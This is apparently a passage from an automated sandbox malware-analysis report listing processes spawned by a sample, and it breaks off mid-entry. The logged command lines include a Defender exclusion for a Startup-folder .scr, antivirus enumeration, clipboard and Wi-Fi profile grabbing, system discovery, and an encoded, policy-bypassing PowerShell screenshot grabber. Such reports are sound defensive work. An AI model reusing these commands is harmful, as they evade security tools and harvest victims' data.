                                                                                                                                                                                                                                              Target ID:33
                                                                                                                                                                                                                                              Start time:02:37:28
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:34
                                                                                                                                                                                                                                              Start time:02:37:29
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ??.scr'
                                                                                                                                                                                                                                              Imagebase:0x7ff6e3d50000
                                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:36
                                                                                                                                                                                                                                              Start time:02:37:31
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                                              Imagebase:0x7ff63a870000
                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:37
                                                                                                                                                                                                                                              Start time:02:37:31
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                                              Imagebase:0x7ff63a870000
                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:38
                                                                                                                                                                                                                                              Start time:02:37:31
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:39
                                                                                                                                                                                                                                              Start time:02:37:31
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:40
                                                                                                                                                                                                                                              Start time:02:37:31
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                                                                                                                                                                                                                              Imagebase:0x7ff63a870000
                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:41
                                                                                                                                                                                                                                              Start time:02:37:31
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                                                                                                                                                                                                                              Imagebase:0x7ff63a870000
                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:42
                                                                                                                                                                                                                                              Start time:02:37:31
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                                              Imagebase:0x7ff63a870000
                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:43
                                                                                                                                                                                                                                              Start time:02:37:31
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:44
                                                                                                                                                                                                                                              Start time:02:37:31
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                              Imagebase:0x7ff63a870000
                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:45
                                                                                                                                                                                                                                              Start time:02:37:31
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                                                                                                                                                                                                                              Imagebase:0x7ff63a870000
                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:46
                                                                                                                                                                                                                                              Start time:02:37:31
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "systeminfo"
                                                                                                                                                                                                                                              Imagebase:0x7ff63a870000
                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:47
                                                                                                                                                                                                                                              Start time:02:37:31
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                                                                                                                                                                                                                                              Imagebase:0x7ff63a870000
                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:48
                                                                                                                                                                                                                                              Start time:02:37:31
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:49
                                                                                                                                                                                                                                              Start time:02:37:31
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:50
                                                                                                                                                                                                                                              Start time:02:37:31
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:tasklist /FO LIST
                                                                                                                                                                                                                                              Imagebase:0x7ff644170000
                                                                                                                                                                                                                                              File size:106'496 bytes
                                                                                                                                                                                                                                              MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:51
                                                                                                                                                                                                                                              Start time:02:37:32
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                                                                                                                                                                                                                              Imagebase:0x7ff74c130000
                                                                                                                                                                                                                                              File size:576'000 bytes
                                                                                                                                                                                                                                              MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:52
                                                                                                                                                                                                                                              Start time:02:37:32
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:tasklist /FO LIST
                                                                                                                                                                                                                                              Imagebase:0x7ff644170000
                                                                                                                                                                                                                                              File size:106'496 bytes
                                                                                                                                                                                                                                              MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:53
                                                                                                                                                                                                                                              Start time:02:37:32
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:tasklist /FO LIST
                                                                                                                                                                                                                                              Imagebase:0x7ff644170000
                                                                                                                                                                                                                                              File size:106'496 bytes
                                                                                                                                                                                                                                              MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:54
                                                                                                                                                                                                                                              Start time:02:37:32
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:powershell Get-Clipboard
                                                                                                                                                                                                                                              Imagebase:0x7ff6e3d50000
                                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:55
                                                                                                                                                                                                                                              Start time:02:37:33
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:56
                                                                                                                                                                                                                                              Start time:02:37:33
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:57
                                                                                                                                                                                                                                              Start time:02:37:33
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:58
                                                                                                                                                                                                                                              Start time:02:37:33
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff7c9590000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:59
                                                                                                                                                                                                                                              Start time:02:37:33
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                                                                                                                                                                                                                              Imagebase:0x7ff63a870000
                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:60
                                                                                                                                                                                                                                              Start time:02:37:33
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\reg.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                                                                                                                                                                                                                                              Imagebase:0x7ff7403e0000
                                                                                                                                                                                                                                              File size:77'312 bytes
                                                                                                                                                                                                                                              MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:61
                                                                                                                                                                                                                                              Start time:02:37:33
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\systeminfo.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:systeminfo
                                                                                                                                                                                                                                              Imagebase:0x7ff642ec0000
                                                                                                                                                                                                                                              File size:110'080 bytes
                                                                                                                                                                                                                                              MD5 hash:EE309A9C61511E907D87B10EF226FDCD
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:62
                                                                                                                                                                                                                                              Start time:02:37:33
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:tree /A /F
                                                                                                                                                                                                                                              Imagebase:0x7ff733b70000
                                                                                                                                                                                                                                              File size:20'992 bytes
                                                                                                                                                                                                                                              MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:63
                                                                                                                                                                                                                                              Start time:02:37:33
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
